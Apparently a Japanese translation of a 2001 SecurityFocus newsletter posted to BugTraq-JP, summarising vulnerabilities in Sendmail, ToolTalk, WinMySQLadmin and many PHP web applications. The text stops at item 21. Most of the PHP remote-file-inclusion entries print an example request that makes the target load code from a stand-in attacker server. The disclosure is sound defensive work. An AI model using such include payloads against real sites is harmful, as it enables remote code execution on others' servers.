Mailing-List: contact bugtraq-jp-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq-jp.list-id.securityfocus.com>
List-Post: <mailto:bugtraq-jp@securityfocus.com>
List-Help: <mailto:bugtraq-jp-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-jp-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-jp-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq-jp@securityfocus.com
Delivered-To: moderator for bugtraq-jp@securityfocus.com
Received: (qmail 16457 invoked from network); 15 Oct 2001 14:00:54 -0000
To: bugtraq-jp@SECURITYFOCUS.COM
Subject: SecurityFocus.com Newsletter #113 2001-10-01->2001-10-05
From: SAKAI Yoriyuki <sakai@lac.co.jp>
Message-Id: <200110152300.ADG30887.LTBJB@lac.co.jp>
X-Mailer: Winbiff [Version 2.33PL2]
X-Accept-Language: ja,en
Date: Mon, 15 Oct 2001 23:00:47 +0900
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-2022-jp

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

坂井@ラックです。

SecurityFocus.com Newsletter 第 113 号の和訳をお届けします。
訳のない項目については「日本語訳なし」として区別してあります。

- ---------------------------------------------------------------------------
SecurityFocus.com Newsletter に関するFAQ:
<URL: http://www.securityfocus.com/forums/sf-news/faq.html>
BugTraq-JP に関する FAQ:
<URL: http://www.securityfocus.com/forums/bugtraq-jp/faq.html>
- ---------------------------------------------------------------------------
引用に関する備考:
・この和訳は Security-Focus.com の許可を株式会社ラックが得た上で行わ
  れています。
・SecurityFocus.com Newsletter の和訳を Netnews, Mailinglist,
  World Wide Web, 書籍, その他の記録媒体で引用される場合にはメールの
  全文引用をお願いします。
・日本語版ニュースレター 1 号から 3 号までにはこの備考が付いていませ
  んが準用するものとします。
・また、Security-Focus.com 提供の BugTraq-JP アーカイブ [*1] へのいか
  なる形式のハイパーリンクも上記に準じてください。
1) <URL http://www.securityfocus.com/templates/archive.pike?list=79>
- ---------------------------------------------------------------------------
- ---------------------------------------------------------------------------
この和訳に関する備考:
・この和訳の適用成果について株式会社ラックは責任を負わないものとしま
  す。
- ---------------------------------------------------------------------------
- ---------------------------------------------------------------------------
訳者からのお知らせ:
・もし、typo や誤訳が見つかった場合、BUGTRAQ-JP へ Errata として修正
  版をご投稿頂くか、訳者にお知らせください。
  後者の場合には修正版をできるだけ迅速に発行します。
- ---------------------------------------------------------------------------
- ---------------------------------------------------------------------------

Date: Wed, 10 Oct 2001 10:20:58 -0600 (MDT)
Message-ID: <Pine.GSO.4.30.0110101020170.26814-100000@mail>

SecurityFocus Newsletter #113
- -----------------------------

This Issue Sponsored By: Pentasafe

I. FRONT AND CENTER(日本語訳なし)
     1. ARIS extractor 1.5 release
     2. Introduction to Security Policies, Part Three: Structuring
        Security
     3. An Introduction OpenSSL, Part Four: The SSL and TLS Protocols
     4. Does IIS Have a Future?
     5. How to Design a Useful Incident Response Policy
II. BUGTRAQ SUMMARY
     1. Sendmail Inadequate Privilege Lowering Vulnerability
     2. Sendmail Queue Processing Data Loss/DoS Vulnerability
     3. Hans Wolters phpReview Cross-Site Scripting Vulnerability
     4. WinMySQLadmin Plain Text Password Storage Vulnerability
     5. Multiple CDE Vendor ToolTalk Database Server Format String...
     6. Marc Logemann More.groupware Remote Arbitrary Code Execution...
     7. Actionpoll Remote Arbitrary Code Execution Vulnerability
     8. Grant Horwood Webodex Remote Arbitrary Code Execution...
     9. Zorbat ZorbStats Remote Arbitrary Code Execution Vulnerability
     10. AWOL Remote Arbitrary Code Execution Vulnerability
     11. Paul M. Jones Phorecast Remote Arbitrary Code Execution...
     12. CCC Remote Arbitrary Code Execution Vulnerability
     13. Dark Hart Portal Remote Arbitrary Code Execution Vulnerability
     14. Empris Remote Arbitrary Code Execution Vulnerability
     15. Tobias Ratschiller phpAdsNew Remote Arbitrary Code Execution...
     16. Peaceworks Computer Consulting Phormation Remote Arbitrary...
     17. Sebastian Bunka myphpPagetool Arbitrary Code Execution...
     18. Derek Leung pSlash Remote Arbitrary Code Execution Vulnerability
     19. Haakon Nilsen SIPS Remote Arbitrary Code Execution Vulnerability
     20. Bharat Mediratta Gallery Remote Arbitrary Code Execution...
     21. HP OpenView Network Node Manager Arbitrary Privilege Elevation...
     22. HP-UX RPCBind Random Buffer Overflow Denial of Service...
     23. Cerulean Studios Trillian Denial of Service Vulnerability
     24. Microsoft Excel and PowerPoint Macro Security Bypass...
     25. Symantec Norton Antivirus LiveUpdate Host Verification...
     26. Progress Database Multiple Buffer Overflow Vulnerability
     27. Progress Database JvmStart Format String Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
     1. Zero-Knowledge to Close Anonymity Service
     2. House Panel Approves Expanded Surveillance Powers
     3. Alternative Anti-terror bill limits life sentence for hackers
     4. A Battle-Ready Net?
IV.SECURITY FOCUS TOP 6 TOOLS
     1. libsmbpw v1.3
     2. GPG Keys v0.2.0
     3. grsecurity v1.8
     4. XOR Cipher Analyzer 0.3
     5. mcrypt v2.5.9
     6. gShield v2.7.1

I. FRONT AND CENTER(日本語訳なし)
- ---------------------------------

II. BUGTRAQ SUMMARY
- -------------------
1. Sendmail Inadequate Privilege Lowering Vulnerability
BugTraq ID: 3377
リモートからの再現性: なし
公開日: 2001-10-01 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3377
まとめ:

sendmail は大抵、様々な UNIX 環境に同梱されている、広範囲で利用されてい
る MTA である。

バージョン 8.12.0 未満では、このデーモンの実行ファイルは setuid root
としてインストールされている。このため、sendmail に対するローカルから
の攻撃可能な脅威 (ユーザによる root 権限の奪取が想定される) を最小限度
に抑えるために、バージョン 8.12.0 ではこのデーモンを実行するために利用
される root 以外の電子メール用のグループの権限で実行される様な設計変更
が行われている。

しかし、sendmail の一部の機能、すなわち設定ファイルの解釈機構部は新し
い権限レベルでの動作という規範を満たすようにはなっていないのである。

sendmail の動作時において、ユーザはコマンドラインからユーザが特に明示
する設定ファイルを指定可能である。そしてユーザが指定したデータを処理す
る際に sendmail はセキュリティに関する事前対策として上位の権限を完全に
除去して実行するのである。このため、設定ファイルの解釈機構部において符
号付整数値の取り扱いに関する誤りやその他のバグの要因が解釈される際には、
これらは通常のセキュリティに関する問題とはならないのである (実行される
際には、既に権限は完全に降格されている事が導かれるためである)。

バージョン 8.12.0 において、sendmail は setuid に代えて setgid を利用
する様になっている。また、より低い権限を利用するために setgid() 関数が
利用されている。しかし、この関数は保存済みのグループ ID を設定しないの
である。従って、攻撃者が setregid() 関数を呼び出す事が可能である場合に
は有効なグループ ID を再利用する事が可能になってしまうのである。

設定ファイルの解釈機構部に存在するいくつかのバグを利用する事でこの問題
を利用する攻撃が行われる事が想定される。

攻撃者が権限昇格を行えた場合、電子メール授受システムは攻撃者によって実
行権限を奪取されてしまう事が考えられ、攻撃者はこの際ユーザのメールファ
イルやキューの内容を改変可能になる。

攻撃者が一度 sendmail やキューファイルの管理用権限を奪取でき得る場合、
さらなる権限昇格の可能性が想定される。

2. Sendmail Queue Processing Data Loss/DoS Vulnerability
BugTraq ID: 3378
リモートからの再現性: なし
公開日: 2001-10-01 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3378
まとめ:

sendmail はフリーで提供され、広範囲に利用される Mail Transfer Agent
(MTA) である。このソフトウェアは Sendmail Consortium によって保守されて
いる。

このソフトウェアには sendmail の本来のユーザへのサービス提供を不能にし
てしまう事が可能な問題が発見されている。この問題はソフトウェアのプログ
ラミング方法の誤りに由来している。

sendmail は一般ユーザに対してメールのキューの処理をいかなる場合でも強制
的に行える様な設計が行われている。このため、sendmail の実行時において、
ユーザは sendmail へあらかじめ設定されているメッセージのホップカウント
数の限度以上の値を設定する等の重要な設定値の変更が可能である。
例えばこの種の変更が行われた際、キュー内にあるメールは処理がなされる際
に処理から外されてしまうのである。

この問題を利用する攻撃が行われた場合、攻撃者はデータの損失、DoS を引き
起こす事が可能である。

3. Hans Wolters phpReview Cross-Site Scripting Vulnerability
BugTraq ID: 3380
リモートからの再現性: あり
公開日: 2001-10-01 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3380
まとめ:

phpReview はフリーで利用可能であり、オープンソースであり、また再設定可
能な機能を持つ Web コンテンツの「査読」機能を提供するアプリケーションで
ある。このソフトウェアにより、ユーザは書籍やフィルムの様に見直し結果を
入力し、内容の査読を行う事が可能である。

しかし、このソフトウェアはユーザが入力した査読結果に含まれる HTML タグ
のフィルタリングを行っていないのである。このため悪意あるユーザは悪意あ
るスクリプトを含む内容を査読内容に含め、このプログラムに引き渡す事が可
能なのである。この問題を利用する攻撃が成功した場合、悪意を持って入力さ
れた査読結果を参照したユーザの Web ブラウザ上で、該当するスクリプトは実
行され、このソフトウェアを実行する Web サイトが当該スクリプトの起源であ
るかの様に観測される状況がもたらされる。

この問題はクロスサイトスクリプティングを利用する攻撃にユーザを曝す結果
をもたらし、例えばクッキーを利用する認証を行う権限の奪取と言った攻撃を
生じさせる可能性が想定される。

4. WinMySQLadmin Plain Text Password Storage Vulnerability
BugTraq ID: 3381
リモートからの再現性: なし
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3381
まとめ:

WinMySQLadmin は MySQLデータベース内の情報を管理する機能を提供するプロ
グラムである。このソフトウェアは動作環境と設定情報を記録している my.ini
と言う名称のファイルを作成している。

しかし、このソフトウェアのバージョン 1.1 には本来漏洩されてはならない
MySQL 用の機密の認証用情報を開示可能となる問題が存在するのである。

ローカルのユーザが my.ini ファイルへのアクセスを可能にした場合、ファイ
ルの内容は、平文で記述されている、設定情報、権限を与えられたユーザ名と
パスワード情報を開示してしまうのである。

なお、適切なファイルへのパーミッションが設定されている場合、平均的な権
限を持つユーザがこのファイルの参照を行う可能性は低いと考えられる。
しかし実際の所、この問題を利用する攻撃が行われるかどうかは設定環境次第
である。

この問題を利用する攻撃が成功した場合、さらなるホストのセキュリティへの
脅威を招く補助手段となる可能性がある。

5. Multiple CDE Vendor ToolTalk Database Server Format String Vulnerability
BugTraq ID: 3382
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3382
まとめ:

CDE は ToolTalk database server と呼ばれるデーモンを同梱して提供されて
いる。このデーモンは CDE 内で動作する様に設計されたプログラムが互いに通
信する機能を提供している。CDE を同梱して提供されている多くのシステムで
は、デフォルト状態でこのデーモンは利用可能な状態に設定されている。

ToolTalk database server はリモートから攻撃可能な書式指定子の取り扱いに
由来する問題を抱えている。問題はこのソフトウェアのログ採取部に存在して
いる。

UNIX 上で動作する多くのアプリケーションは syslog デーモンを解してイベン
トをログファイルへ記録するために syslog ファシリティを利用可能である。
ログへ記録されるメッセージを作成するために、syslog() 関数は書式指定子を
含む引数と様々な書式指定子に関連する有効な値を受け付けている。受け付け
た結果、最終的にはログへ記録されるメッセージは libc で提供されている
printf() 相当の関数で処理が行われる。この際、書式指定子を示す文字列に外
部からの値が含まれている場合、悪意ある書式指定子を用いてメモリ内の任意
の場所の値の上書きを、ほぼ任意の値で強制的に行う事が想定される。

ToolTalk database server は外部から与えられるデータを書式指定子への引数
として syslog() 関数へ引き渡す仕様である。このため、外部から与えられる
データに含まれる書式指定子はどのようなものであっても printf() 関数相当
の関数で解釈されてしまうのである。

注意深く組み立てられた書式指定付き文字列とメモリ内の正確なアドレスの指
示を利用して、攻撃者が関数のポインタやポインタを含むリターンアドレスが
シェルコードを指し示す様に重要な値の置き換えを図る可能性が想定される。

この問題を利用する攻撃が成功した場合、リモートの攻撃者は DoS、あるいは
攻撃対象のホストの root 権限の奪取を招く事が可能である。

6. Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3383
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3383
まとめ:

More.groupware はフリーで提供され、Web を利用するグループウェアである。
このソフトウェアは Web インタフェースを介するユーザ間のオンラインによる
共同作業環境を提供している。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

7. Actionpoll Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3384
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3384
まとめ:

Actionpoll はフリーで提供され、オープンソースとして公開される、PHP を利
用する投票機能を提供するプログラムである。このソフトウェアにより、MySQL
を利用したデータベースあるいはテキストファイル内に格納された内容に関す
る調査を行う事が可能である。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

8. Grant Horwood Webodex Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3385
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3385
まとめ:

Grant Horwood Webodex は PHP を利用して作成された Web を介するメーリン
グリスト管理機能を提供するシステムである。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

この問題は問題の原因となる変数がグローバル変数であり、かつ、内容が未定
義であるために発生する。

9. Zorbat ZorbStats Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3386
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3386
まとめ:

ZornStats は Zorbat により保守が行われている、Web サイトのトラフィック
に関する統計結果を生成するソフトウェアであり、PHP を利用して作成されて
いる。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この結果、問題の影響を受けるスクリプトは、攻撃
者により指定された、当該ホスト以外のホストに存在する任意のコードを実行
する様なリダイレクト処理を強制されてしまう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

10. AWOL Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3387
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3387
まとめ:

AWOL はフリーで提供され、オープンソースであり、掲示板への投稿と参照をシ
ミュレートするための Web を介するインタフェースを提供するための PHP を
利用して作成されたソフトウェアである。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

11. Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3388
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3388
まとめ:

Phorecast はフリーで提供され、オープンソースである Web を利用した単一ユー
ザ用の電子メール環境を提供するソフトウェアである。このソフトウェアは Web
を利用するインタフェースを元に、電子メールの授受機能を提供している。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

12. CCC Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3389
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3389
まとめ:

CCC はフリーで提供され、PHP で記述されている Web を介するインタフェース
を持つ在庫状況調査システムである。また、このソフトウェアは契約管理機能、
勤怠管理機能、給与支払い管理機能も提供している。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

13. Dark Hart Portal Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3390
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3390
まとめ:

Dark Hart Portal はフリーで提供され、オープンソースであり、PHP を利用し
て作成されている Web ポータル機能を提供するソフトウェアである。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

14. Empris Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3391
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3391
まとめ:

Empris は PHP を利用して作成された雇用出願書の管理を行うためのソフトウェ
アである。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

15. Tobias Ratschiller phpAdsNew Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3392
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3392
まとめ:

phpAdsNew は Tobias Ratschiller により作成された PHP を用いて記述された
Web サイトのバナーを管理するためのアプリケーションである。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この結果、問題の影響を受けるスクリプトは、攻撃
者により指定された、当該ホスト以外のホストに存在する任意のコードを実行
する様なリダイレクト処理を強制されてしまう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

16. Peaceworks Computer Consulting Phormation Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3393
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3393
まとめ:

Phormation はフリーで提供され、オープンソースである一連の PHP 関数群を
提供するソフトウェアである。このソフトウェアはバックエンドに設置したデー
タベースを利用して何種類かの HTML フォームを作成する機能を提供している。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

17. Sebastian Bunka myphpPagetool Arbitrary Code Execution Vulnerability
BugTraq ID: 3394
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3394
まとめ:

myphpPagetool は Web ページと内容が全て格納、管理対象とされている MySQL
で構築されたデータベースを利用し、Web サイトを運営管理を行うために利用
されるソフトウェアである。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

18. Derek Leung pSlash Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3395
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3395
まとめ:

pSlash はフリーで提供され、オープンソースである Web ポータル機能を提供
するソフトウェアである。このソフトウェアはテンプレートを利用したユーザ
独自の Web サイトの作成を可能にしている。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

19. Haakon Nilsen SIPS Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3396
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3396
まとめ:

SIPS は PHP が利用可能になっている Web サーバで Web のアクセス記録の採
取とハイパーリンクへのインデックス作成を行うソフトウェアであり、Haakon
Nilsen により保守が行われている。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

20. Bharat Mediratta Gallery Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3397
リモートからの再現性: あり
公開日: 2001-10-02 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3397
まとめ:

Gallery はフリーで利用可能な、オープンソースで提供されている Web を利用
する画廊サイト機能を提供するソフトウェアである。このソフトウェアはテン
プレートを利用したユーザ独自の Web を利用した画廊サイトの作成を可能にし
ている。

このソフトウェアにはリモートの攻撃者が任意のコードをこのソフトウェアを
稼動させている攻撃対象のホスト上で (Web サーバの実行権限で) 実行可能で
ある問題が存在する。これは $include 変数の値に任意のデータを与える事が
可能であるために生じる。この値は実行される PHP コードを含むファイルを指
定するために利用されている。PHP の仕様では、明示的に定義されていない場
合、あるいは、スクリプト自身で初期化されていない場合には、スクリプト内
の変数への値は Web ブラウザから与えられるとの仮定がある。この結果、問題
の影響を受けるスクリプトは、攻撃者により指定された、当該ホスト以外のホ
ストに存在する任意のコードを実行する様なリダイレクト処理を強制されてし
まう事が想定されるのである。

リモートの攻撃者が悪意を持って組み立てられた URL を指定した場合、この
問題を利用する攻撃を行う事が可能である。

以下はスクリプトが攻撃者により指定された任意のコードを実行する例を示す
悪意ある Web リクエストである。

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

21. HP OpenView Network Node Manager Arbitrary Privilege Elevation Vulnerability
